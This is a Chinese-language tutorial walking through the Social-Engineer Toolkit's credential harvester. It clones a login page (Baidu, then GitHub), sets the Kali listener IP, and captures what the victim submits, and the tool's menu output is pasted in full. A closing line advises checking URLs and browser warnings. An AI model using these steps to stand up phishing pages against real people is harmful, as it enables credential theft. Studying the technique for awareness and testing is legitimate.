setoolkit简易社会工程学攻击

工具kali自带，终端中输入setoolkit回车，如果是第一次打开的话会给提示，输入y回车同意使用
1.setoolkit



2.进入软件界面，上方的logo部分这里我就不去截图了，直接看最下方的菜单界面，这里我们选择第一个 social engineering attacks社会工程攻击


3.回车后进入下一个界面，一大串洋文，这里选择第二个，Website Attack Vectors（网站攻击媒介）


4.回车后继续看洋文，我们选择第三个，Credential Harvester Attack Method（凭证收割机）


5.还得回车看洋文，到这一步就是最后一次看菜单了，这里选择第2个，Site Cloner（网站克隆）


6.回车后要求你填写监听的ip地址，因为我们这次攻击的目的是抄一个跟原网站相同的网站界面出来，然后让用户访问并登陆，在输入密码提交之后，这些本来应该隐藏的数据就会被提交到这里我们填写的这个ip地址上，这里我填写了kali的地址


7.要求输入一个需要克隆的网址，直接用百度的网址来测试


8.等一小会儿会出现以下界面，当然因为我们本来是要截取用户名和密码的，但百度的主页面是没有post传值的输入框的，所以它会中途提示我是否继续，这里直接回车就行，证明克隆完成，然后我们在本地访问一下这个网站，因为克隆下来的网站被默认打入了kali的/var/www/html目录中了，可以通过ip访问，下图演示的是我已经从本地访问了一次的效果，可以看到访问的ip是127.0.0.1
9.然后我们在本地浏览器上登陆这个假网站

当然如果抹除了地址栏看起来就非常像了，这边尝试在搜索框里输入一些内容，然后回车

很快你就会发现浏览器跳转了
当然后台也已经截取到了访问该网站的ip
浏览器会正常跳转是因为钓鱼网站的工作原理大致就是这样的，先给你一个高仿页面让你输入用户名密码，然后等你输入完毕点提交的时候页面直接把你转到正规网站上去，你克隆的网站只是一个假身，在假身施法完毕之后会再把你打回真身上去，这种情况就会让人误以为是浏览器卡了没登陆成功，但实际上假身已经把刚才输入的密码都记录下来了。
但这样实在是太不明显了，工具只是截取了一个ip，连内容都没给我取出来，所以这里又开了一台dvwa靶机把上述步骤重做一次。

           ,..-,
         ,;;f^^"""-._
        ;;'          `-.
       ;/               `.
       ||  _______________\_______________________
       ||  |HHHHHHHHHHPo"~~\"o?HHHHHHHHHHHHHHHHHHH|
       ||  |HHHHHHHHHP-._   \,'?HHHHHHHHHHHHHHHHHH|
        |  |HP;""?HH|    """ |_.|HHP^^HHHHHHHHHHHH|
        |  |HHHb. ?H|___..--"|  |HP ,dHHHPo'|HHHHH|
        `| |HHHHHb.?Hb    .--J-dHP,dHHPo'_.rdHHHHH|
         \ |HHHi.`;;.H`-./__/-'H_,--'/;rdHHHHHHHHH|
           |HHHboo.\ `|"\"/"\" '/\ .'dHHHHHHHHHHHH|
           |HHHHHHb`-|.  \|  \ / \/ dHHHHHHHHHHHHH|
           |HHHHHHHHb| \ |\   |\ |`|HHHHHHHHHHHHHH|
           |HHHHHHHHHb  \| \  | \| |HHHHHHHHHHHHHH|
           |HHHHHHHHHHb |\  \|  |\|HHHHHHHHHHHHHHH|
           |HHHHHHHHHHHb| \  |  / dHHHHHHHHHHHHHHH|
           |HHHHHHHHHHHHb  \/ \/ .fHHHHHHHHHHHHHHH|
           |HHHHHHHHHHHHH| /\ /\ |HHHHHHHHHHHHHHHH|
           |""""""""""""""""""""""""""""""""""""""|
           |,;=====.     ,-.  =.       ,=,,=====. |
           |||     '    //"\\   \\   //  ||     ' |
           |||         ,/' `\.  `\. ,/'  ``=====. |
           |||     .   //"""\\   \\_//    .     |||
           |`;=====' =''     ``=  `-'     `=====''|
           |______________________________________|
	

[---]        The Social-Engineer Toolkit (SET)         [---]
[---]        Created by: David Kennedy (ReL1K)         [---]
                      Version: 7.7.9
                   Codename: 'Blackout'
[---]        Follow us on Twitter: @TrustedSec         [---]
[---]        Follow me on Twitter: @HackingDave        [---]
[---]       Homepage: https://www.trustedsec.com       [---]
        Welcome to the Social-Engineer Toolkit (SET).
         The one stop shop for all of your SE needs.

     Join us on irc.freenode.net in channel #setoolkit

   The Social-Engineer Toolkit is a product of TrustedSec.

           Visit: https://www.trustedsec.com

   It's easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!


          There is a new version of SET available.
                     Your version: 7.7.9
                  Current version: 8.0.1

Please update SET to the latest before submitting any git issues.


 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules

  99) Return back to the main menu.

set> 2

The Web Attack module is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

The Java Applet Attack method will spoof a Java Certificate and deliver a metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.

The Metasploit Browser Exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

The Credential Harvester method will utilize web cloning of a web- site that has a username and password field and harvest all the information posted to the website.

The TabNabbing method will wait for a user to move to a different tab, then refresh the page to something different.

The Web-Jacking Attack method was introduced by white_sheep, emgent. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.

The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing all at once to see which is successful.

The HTA Attack method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method
   8) HTA Attack Method

  99) Return to Main Menu

set:webattack>3

 The first method will allow SET to import a list of pre-defined web
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   
   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2
[-] Credential harvester will allow you to utilize the clone capabilities within SET
[-] to harvest credentials or parameters from a website as well as place them into a report

-------------------------------------------------------------------------------
--- * IMPORTANT * READ THIS BEFORE ENTERING IN THE IP ADDRESS * IMPORTANT * ---

The way that this works is by cloning a site and looking for form fields to
rewrite. If the POST fields are not usual methods for posting forms this 
could fail. If it does, you can always save the HTML, rewrite the forms to
be standard forms and use the "IMPORT" feature. Additionally, really 
important:

If you are using an EXTERNAL IP ADDRESS, you need to place the EXTERNAL
IP address below, not your NAT address. Additionally, if you don't know
basic networking concepts, and you have a private IP address, you will
need to do port forwarding to your NAT IP address from your external IP
address. A browser doesns't know how to communicate with a private IP
address, so if you don't specify an external IP address if you are using
this from an external perpective, it will not work. This isn't a SET issue
this is how networking works.

set:webattack> IP address for the POST back in Harvester/Tabnabbing [kali ip]:kali ip
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:https://github.com 

[*] Cloning the website: https://github.com
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[*] You may need to copy /var/www/* into /var/www/html depending on where your directory structure is.
Press {return} if you understand what we're saying here.
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

这里可以看到我选用了github的网站，拷贝下来如图所示，浏览器已经给我风险提示了

然后我们尝试输入一些内容在上面提交

提交之后就被转入github正规官网了

这个时候切回kali就能发现我们已经捕捉到用户输入的全部信息了



如此便成功构建了一个简易的钓鱼网站，在实际应用中这样的假身页面是挂在公网上的，但无论网站如何进行伪造，其url地址亦不可能跟原网址一模一样，要根据对方url地址的详细变动来区分，同时要注意浏览器本身自带的安全提醒。